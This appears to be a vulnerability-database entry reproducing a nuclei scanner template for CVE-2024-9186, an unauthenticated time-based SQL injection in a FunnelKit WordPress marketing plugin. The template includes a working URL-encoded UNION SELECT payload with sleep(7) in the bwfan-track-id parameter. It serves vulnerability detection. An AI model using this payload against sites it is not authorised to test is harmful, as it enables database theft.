Automation By Autonami < 3.3.0 - SQL Injection

02 Jul 2026 09:36:57. Reported by ProjectDiscovery. Type: nuclei. Source: github.com. 32 views.

The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit WordPress plugin before 3.3.0 is vulnerable to SQL injection.

Code
id: CVE-2024-9186

info:
  name: Automation By Autonami < 3.3.0 - SQL Injection
  author: s4e-io
  severity: high
  description: |
    The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit WordPress plugin before 3.3.0 does not sanitize and escape the bwfan-track-id parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks.
  impact: |
    Unauthenticated attackers can exploit time-based SQL injection through the bwfan-track-id parameter to extract sensitive database information including user credentials, email addresses, WooCommerce customer data, and marketing automation information.
  remediation: |
    Fixed in 3.3.0
  reference:
    - https://wpscan.com/vulnerability/fab29b59-7e87-4289-88dd-ed5520260c26/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9186
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-89
    cve-id: CVE-2024-9186
    epss-score: 0.02241
    epss-percentile: 0.80675
  metadata:
    verified: true
    max-request: 2
    vendor: funnelkit
    product: wp-marketing-automations
    framework: wordpress
    fofa-query: body="wp-content/plugins/wp-marketing-automations/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,wp-marketing-automations,time-based-sqli,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/wp-marketing-automations")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        @timeout 20s
        GET /?bwfan-track-id=test%27%20UNION%20SELECT%201%2C1%2C%27%27%2CNOW()%2CNOW()%2C1%2C%27%27%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C%27%27%2CNOW()%2C%27%27%2CNOW()%2C1%2C1%2Csleep(7)%23&bwfan-track-action=click HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "duration>=7"
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100ab599d42821ad59aadd84821cdfff1223ed6e907024542fb227ad93a69fc9a6c022100b6a5a054853ff48d1aad75810baa9e0e6eb7700b49eeac5752c38318802641e7:922c64590222798bb761d5b6d8e72950


Scores (current as of 04 Feb 2026 07:00):
Vulners AI Score: 5.8 (Medium risk)
CVSS 3.1: 8.6
EPSS: 0.02241
SSVC: not listed